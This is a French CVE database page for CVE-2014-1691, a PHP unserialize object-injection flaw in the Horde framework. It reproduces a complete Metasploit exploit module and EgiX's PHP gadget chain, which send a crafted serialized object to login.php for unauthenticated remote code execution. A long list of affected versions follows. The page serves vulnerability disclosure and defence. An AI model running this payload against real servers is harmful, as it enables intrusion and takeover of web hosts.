CVE-2014-1691
Notifications pour un CVE
Restez informé de toutes modifications pour un CVE spécifique.
Descriptions du CVE
The framework/Util/lib/Horde/Variables.php script in the Util library in Horde before 5.1.1 allows remote attackers to conduct object injection attacks and execute arbitrary PHP code via a crafted serialized object in the _formvars form.
Informations du CVE
Faiblesses connexes
| Nom de la faiblesse | Source | |
|---|---|---|
| Improper Control of Generation of Code ('Code Injection') The product constructs all or part of a code segment using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the syntax or behavior of the intended code segment. |
Métriques
| Métriques | Score | Gravité | CVSS Vecteur | Source |
|---|---|---|---|---|
| V2 | 7.5 | AV:N/AC:L/Au:N/C:P/I:P/A:P | nvd@nist.gov |
EPSS
EPSS est un modèle de notation qui prédit la probabilité qu'une vulnérabilité soit exploitée.
Score EPSS
Le modèle EPSS produit un score de probabilité compris entre 0 et 1 (0 et 100 %). Plus la note est élevée, plus la probabilité qu'une vulnérabilité soit exploitée est grande.
Percentile EPSS
Le percentile est utilisé pour classer les CVE en fonction de leur score EPSS. Par exemple, une CVE dans le 95e percentile selon son score EPSS est plus susceptible d'être exploitée que 95 % des autres CVE. Ainsi, le percentile sert à comparer le score EPSS d'une CVE par rapport à d'autres CVE.
Informations sur l'Exploit
Exploit Database EDB-ID : 32439
Date de publication : 2014-03-21 23h00 +00:00
Auteur : Metasploit
EDB Vérifié : Yes
##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
def initialize(info = {})
super(update_info(info,
'Name' => 'Horde Framework Unserialize PHP Code Execution',
'Description' => %q{
This module exploits a php unserialize() vulnerability in Horde <= 5.1.1 which could be
abused to allow unauthenticated users to execute arbitrary code with the permissions of
the web server. The dangerous unserialize() exists in the 'lib/Horde/Variables.php' file.
The exploit abuses the __destruct() method from the Horde_Kolab_Server_Decorator_Clean
class to reach a dangerous call_user_func() call in the Horde_Prefs class.
},
'Author' =>
[
'EgiX', # Exploitation technique and Vulnerability discovery (originally reported by the vendor)
'juan vazquez' # Metasploit module
],
'License' => MSF_LICENSE,
'References' =>
[
[ 'CVE', '2014-1691' ],
[ 'URL', 'http://karmainsecurity.com/exploiting-cve-2014-1691-horde-framework-php-object-injection' ],
[ 'URL', 'https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=737149' ],
[ 'URL', 'https://github.com/horde/horde/commit/da6afc7e9f4e290f782eca9dbca794f772caccb3' ]
],
'Privileged' => false,
'Platform' => ['php'],
'Arch' => ARCH_PHP,
'Payload' =>
{
'DisableNops' => true
},
'Targets' => [ ['Horde 5', { }], ],
'DefaultTarget' => 0,
'DisclosureDate' => 'Jun 27 2013'
))
register_options(
[
OptString.new('TARGETURI', [ true, "The base path to Horde", "/horde/"])
], self.class)
end
def check
flag = rand_text_alpha(rand(10)+20)
res = send_request_exploit("print #{flag};die;")
if res and res.body and res.body.to_s =~ /#{flag}/
return Exploit::CheckCode::Vulnerable
end
return Exploit::CheckCode::Safe
end
def exploit
print_status("#{peer} - Testing injection...")
unless check == Exploit::CheckCode::Vulnerable
fail_with(Failure::NotVulnerable, "#{peer} - Target isn't vulnerable, exiting...")
end
print_status("#{peer} - Exploiting the unserialize()...")
send_request_exploit(payload.encoded)
end
def send_request_exploit(p)
php_injection = "eval(base64_decode($_SERVER[HTTP_CMD]));die();"
payload_serialized = "O:34:\"Horde_Kolab_Server_Decorator_Clean\":2:{s:43:\"\x00Horde_Kolab_Server_Decorator_Clean\x00_server\";"
payload_serialized << "O:20:\"Horde_Prefs_Identity\":2:{s:9:\"\x00*\x00_prefs\";O:11:\"Horde_Prefs\":2:{s:8:\"\x00*\x00_opts\";a:1:{s:12:\"sizecallback\";"
payload_serialized << "a:2:{i:0;O:12:\"Horde_Config\":1:{s:13:\"\x00*\x00_oldConfig\";s:#{php_injection.length}:\"#{php_injection}\";}i:1;s:13:\"readXMLConfig\";}}"
payload_serialized << "s:10:\"\x00*\x00_scopes\";a:1:{s:5:\"horde\";O:17:\"Horde_Prefs_Scope\":1:{s:9:\"\x00*\x00_prefs\";a:1:{i:0;i:1;}}}}"
payload_serialized << "s:13:\"\x00*\x00_prefnames\";a:1:{s:10:\"identities\";i:0;}}s:42:\"\x00Horde_Kolab_Server_Decorator_Clean\x00_added\";a:1:{i:0;i:1;}}"
send_request_cgi(
{
'uri' => normalize_uri(target_uri.path.to_s, "login.php"),
'method' => 'POST',
'vars_post' => {
'_formvars' => payload_serialized
},
'headers' => {
'Cmd' => Rex::Text.encode_base64(p)
}
})
end
end
=begin
PHP chain by EgiX: http://karmainsecurity.com/exploiting-cve-2014-1691-horde-framework-php-object-injection
class Horde_Config
{
protected $_oldConfig = "phpinfo();die;";
}
class Horde_Prefs_Scope
{
protected $_prefs = array(1);
}
class Horde_Prefs
{
protected $_opts, $_scopes;
function __construct()
{
$this->_opts['sizecallback'] = array(new Horde_Config, 'readXMLConfig');
$this->_scopes['horde'] = new Horde_Prefs_Scope;
}
}
class Horde_Prefs_Identity
{
protected $_prefs, $_prefnames;
function __construct()
{
$this->_prefs = new Horde_Prefs;
$this->_prefnames['identities'] = 0;
}
}
class Horde_Kolab_Server_Decorator_Clean
{
private $_server, $_added = array(1);
function __construct()
{
$this->_server = new Horde_Prefs_Identity;
}
}
$popchain = serialize(new Horde_Kolab_Server_Decorator_Clean);
=end
Products Mentioned
Configuraton 0
Horde>>Horde_application_framework >> Version To (including) 5.1.0
- Horde>>Horde_application_framework >> Version 1.0.3 (Open CPE detail)
- Horde>>Horde_application_framework >> Version 1.1.1 (Open CPE detail)
- Horde>>Horde_application_framework >> Version 1.3.0 (Open CPE detail)
- Horde>>Horde_application_framework >> Version 1.3.1 (Open CPE detail)
- Horde>>Horde_application_framework >> Version 1.3.2 (Open CPE detail)
- Horde>>Horde_application_framework >> Version 1.3.3 (Open CPE detail)
- Horde>>Horde_application_framework >> Version 1.3.4 (Open CPE detail)
- Horde>>Horde_application_framework >> Version 1.3.5 (Open CPE detail)
- Horde>>Horde_application_framework >> Version 2.0 (Open CPE detail)
- Horde>>Horde_application_framework >> Version 2.0 (Open CPE detail)
- Horde>>Horde_application_framework >> Version 2.0 (Open CPE detail)
- Horde>>Horde_application_framework >> Version 2.0 (Open CPE detail)
- Horde>>Horde_application_framework >> Version 2.1 (Open CPE detail)
- Horde>>Horde_application_framework >> Version 2.2 (Open CPE detail)
- Horde>>Horde_application_framework >> Version 2.2.1 (Open CPE detail)
- Horde>>Horde_application_framework >> Version 2.2.2 (Open CPE detail)
- Horde>>Horde_application_framework >> Version 2.2.3 (Open CPE detail)
- Horde>>Horde_application_framework >> Version 2.2.4 (Open CPE detail)
- Horde>>Horde_application_framework >> Version 2.2.5 (Open CPE detail)
- Horde>>Horde_application_framework >> Version 2.2.6 (Open CPE detail)
- Horde>>Horde_application_framework >> Version 2.2.6 (Open CPE detail)
- Horde>>Horde_application_framework >> Version 2.2.7 (Open CPE detail)
- Horde>>Horde_application_framework >> Version 2.2.8 (Open CPE detail)
- Horde>>Horde_application_framework >> Version 2.2.9 (Open CPE detail)
- Horde>>Horde_application_framework >> Version 3.0 (Open CPE detail)
- Horde>>Horde_application_framework >> Version 3.0 (Open CPE detail)
- Horde>>Horde_application_framework >> Version 3.0 (Open CPE detail)
- Horde>>Horde_application_framework >> Version 3.0 (Open CPE detail)
- Horde>>Horde_application_framework >> Version 3.0 (Open CPE detail)
- Horde>>Horde_application_framework >> Version 3.0 (Open CPE detail)
- Horde>>Horde_application_framework >> Version 3.0.1 (Open CPE detail)
- Horde>>Horde_application_framework >> Version 3.0.2 (Open CPE detail)
- Horde>>Horde_application_framework >> Version 3.0.3 (Open CPE detail)
- Horde>>Horde_application_framework >> Version 3.0.3 (Open CPE detail)
- Horde>>Horde_application_framework >> Version 3.0.4 (Open CPE detail)
- Horde>>Horde_application_framework >> Version 3.0.4 (Open CPE detail)
- Horde>>Horde_application_framework >> Version 3.0.4 (Open CPE detail)
- Horde>>Horde_application_framework >> Version 3.0.5 (Open CPE detail)
- Horde>>Horde_application_framework >> Version 3.0.5 (Open CPE detail)
- Horde>>Horde_application_framework >> Version 3.0.5 (Open CPE detail)
- Horde>>Horde_application_framework >> Version 3.0.6 (Open CPE detail)
- Horde>>Horde_application_framework >> Version 3.0.6 (Open CPE detail)
- Horde>>Horde_application_framework >> Version 3.0.7 (Open CPE detail)
- Horde>>Horde_application_framework >> Version 3.0.8 (Open CPE detail)
- Horde>>Horde_application_framework >> Version 3.0.9 (Open CPE detail)
- Horde>>Horde_application_framework >> Version 3.0.10 (Open CPE detail)
- Horde>>Horde_application_framework >> Version 3.0.11 (Open CPE detail)
- Horde>>Horde_application_framework >> Version 3.0.12 (Open CPE detail)
- Horde>>Horde_application_framework >> Version 3.1 (Open CPE detail)
- Horde>>Horde_application_framework >> Version 3.1 (Open CPE detail)
- Horde>>Horde_application_framework >> Version 3.1 (Open CPE detail)
- Horde>>Horde_application_framework >> Version 3.1 (Open CPE detail)
- Horde>>Horde_application_framework >> Version 3.1.1 (Open CPE detail)
- Horde>>Horde_application_framework >> Version 3.1.2 (Open CPE detail)
- Horde>>Horde_application_framework >> Version 3.1.3 (Open CPE detail)
- Horde>>Horde_application_framework >> Version 3.1.4 (Open CPE detail)
- Horde>>Horde_application_framework >> Version 3.1.4 (Open CPE detail)
- Horde>>Horde_application_framework >> Version 3.1.5 (Open CPE detail)
- Horde>>Horde_application_framework >> Version 3.1.6 (Open CPE detail)
- Horde>>Horde_application_framework >> Version 3.1.7 (Open CPE detail)
- Horde>>Horde_application_framework >> Version 3.1.8 (Open CPE detail)
- Horde>>Horde_application_framework >> Version 3.1.9 (Open CPE detail)
- Horde>>Horde_application_framework >> Version 3.2 (Open CPE detail)
- Horde>>Horde_application_framework >> Version 3.2 (Open CPE detail)
- Horde>>Horde_application_framework >> Version 3.2 (Open CPE detail)
- Horde>>Horde_application_framework >> Version 3.2 (Open CPE detail)
- Horde>>Horde_application_framework >> Version 3.2 (Open CPE detail)
- Horde>>Horde_application_framework >> Version 3.2 (Open CPE detail)
- Horde>>Horde_application_framework >> Version 3.2.1 (Open CPE detail)
- Horde>>Horde_application_framework >> Version 3.2.2 (Open CPE detail)
- Horde>>Horde_application_framework >> Version 3.2.3 (Open CPE detail)
- Horde>>Horde_application_framework >> Version 3.2.4 (Open CPE detail)
- Horde>>Horde_application_framework >> Version 3.2.5 (Open CPE detail)
- Horde>>Horde_application_framework >> Version 3.3 (Open CPE detail)
- Horde>>Horde_application_framework >> Version 3.3 (Open CPE detail)
- Horde>>Horde_application_framework >> Version 3.3.1 (Open CPE detail)
- Horde>>Horde_application_framework >> Version 3.3.2 (Open CPE detail)
- Horde>>Horde_application_framework >> Version 3.3.3 (Open CPE detail)
- Horde>>Horde_application_framework >> Version 3.3.4 (Open CPE detail)
- Horde>>Horde_application_framework >> Version 3.3.4 (Open CPE detail)
- Horde>>Horde_application_framework >> Version 3.3.5 (Open CPE detail)
- Horde>>Horde_application_framework >> Version 3.3.6 (Open CPE detail)
- Horde>>Horde_application_framework >> Version 3.3.7 (Open CPE detail)
- Horde>>Horde_application_framework >> Version 3.3.8 (Open CPE detail)
- Horde>>Horde_application_framework >> Version 3.3.9 (Open CPE detail)
- Horde>>Horde_application_framework >> Version 3.3.10 (Open CPE detail)
- Horde>>Horde_application_framework >> Version 4.0.0 (Open CPE detail)
- Horde>>Horde_application_framework >> Version 4.0.0 (Open CPE detail)
- Horde>>Horde_application_framework >> Version 4.0.0 (Open CPE detail)
- Horde>>Horde_application_framework >> Version 4.0.0 (Open CPE detail)
- Horde>>Horde_application_framework >> Version 4.0.0 (Open CPE detail)
- Horde>>Horde_application_framework >> Version 4.0.1 (Open CPE detail)
- Horde>>Horde_application_framework >> Version 4.0.2 (Open CPE detail)
- Horde>>Horde_application_framework >> Version 4.0.3 (Open CPE detail)
- Horde>>Horde_application_framework >> Version 4.0.4 (Open CPE detail)
- Horde>>Horde_application_framework >> Version 4.0.5 (Open CPE detail)
- Horde>>Horde_application_framework >> Version 4.0.6 (Open CPE detail)
- Horde>>Horde_application_framework >> Version 4.0.7 (Open CPE detail)
- Horde>>Horde_application_framework >> Version 4.0.8 (Open CPE detail)
- Horde>>Horde_application_framework >> Version 4.0.9 (Open CPE detail)
- Horde>>Horde_application_framework >> Version 4.0.10 (Open CPE detail)
- Horde>>Horde_application_framework >> Version 4.0.11 (Open CPE detail)
- Horde>>Horde_application_framework >> Version 4.0.12 (Open CPE detail)
- Horde>>Horde_application_framework >> Version 4.0.13 (Open CPE detail)
- Horde>>Horde_application_framework >> Version 4.0.14 (Open CPE detail)
- Horde>>Horde_application_framework >> Version 4.0.15 (Open CPE detail)
- Horde>>Horde_application_framework >> Version 4.0.16 (Open CPE detail)
- Horde>>Horde_application_framework >> Version 5.0.0 (Open CPE detail)
- Horde>>Horde_application_framework >> Version 5.0.0 (Open CPE detail)
- Horde>>Horde_application_framework >> Version 5.0.0 (Open CPE detail)
- Horde>>Horde_application_framework >> Version 5.0.0 (Open CPE detail)
- Horde>>Horde_application_framework >> Version 5.0.0 (Open CPE detail)
- Horde>>Horde_application_framework >> Version 5.0.0 (Open CPE detail)
- Horde>>Horde_application_framework >> Version 5.0.0 (Open CPE detail)
- Horde>>Horde_application_framework >> Version 5.0.0 (Open CPE detail)
- Horde>>Horde_application_framework >> Version 5.0.0 (Open CPE detail)
- Horde>>Horde_application_framework >> Version 5.0.1 (Open CPE detail)
- Horde>>Horde_application_framework >> Version 5.0.2 (Open CPE detail)
- Horde>>Horde_application_framework >> Version 5.0.3 (Open CPE detail)
- Horde>>Horde_application_framework >> Version 5.0.4 (Open CPE detail)
- Horde>>Horde_application_framework >> Version 5.0.5 (Open CPE detail)
- Horde>>Horde_application_framework >> Version 5.1.0 (Open CPE detail)
- Horde>>Horde_application_framework >> Version 5.1.0 (Open CPE detail)
- Horde>>Horde_application_framework >> Version 5.1.0 (Open CPE detail)
- Horde>>Horde_application_framework >> Version 5.1.0 (Open CPE detail)
- Horde>>Horde_application_framework >> Version 5.1.0 (Open CPE detail)
Horde>>Horde_application_framework >> Version 5.0.0
- Horde>>Horde_application_framework >> Version 5.0.0 (Open CPE detail)
- Horde>>Horde_application_framework >> Version 5.0.0 (Open CPE detail)
- Horde>>Horde_application_framework >> Version 5.0.0 (Open CPE detail)
- Horde>>Horde_application_framework >> Version 5.0.0 (Open CPE detail)
- Horde>>Horde_application_framework >> Version 5.0.0 (Open CPE detail)
- Horde>>Horde_application_framework >> Version 5.0.0 (Open CPE detail)
- Horde>>Horde_application_framework >> Version 5.0.0 (Open CPE detail)
- Horde>>Horde_application_framework >> Version 5.0.0 (Open CPE detail)
- Horde>>Horde_application_framework >> Version 5.0.0 (Open CPE detail)
Horde>>Horde_application_framework >> Version 5.0.1
- Horde>>Horde_application_framework >> Version 5.0.1 (Open CPE detail)
Horde>>Horde_application_framework >> Version 5.0.2
- Horde>>Horde_application_framework >> Version 5.0.2 (Open CPE detail)
Horde>>Horde_application_framework >> Version 5.0.3
- Horde>>Horde_application_framework >> Version 5.0.3 (Open CPE detail)
Horde>>Horde_application_framework >> Version 5.0.4
- Horde>>Horde_application_framework >> Version 5.0.4 (Open CPE detail)
Références
https://github.com/horde/horde/blob/82c400788537cfc0106b68447789ff53793ac086/bundles/groupware/docs/CHANGES#L215
Tags : x_refsource_CONFIRM
Tags : x_refsource_CONFIRM
https://github.com/horde/horde/commit/da6afc7e9f4e290f782eca9dbca794f772caccb3
Tags : x_refsource_CONFIRM
Tags : x_refsource_CONFIRM
Les informations affichées sur CVE Find proviennent de plusieurs sources de référence rigoureusement sélectionnées. Les données CVE sont fournies par MITRE Corporation et la National Vulnerability Database (NVD). Le catalogue des vulnérabilités activement exploitées (KEV) provient de la Cybersecurity and Infrastructure Security Agency (CISA), tandis que les scores EPSS sont issus de FIRST.org. Enfin, les données relatives aux faiblesses logicielles (CWE) et aux schémas d'attaque courants (CAPEC)
sont maintenues par MITRE Corporation, et les informations sur les configurations
logicielles et matérielles (CPE) proviennent du NVD.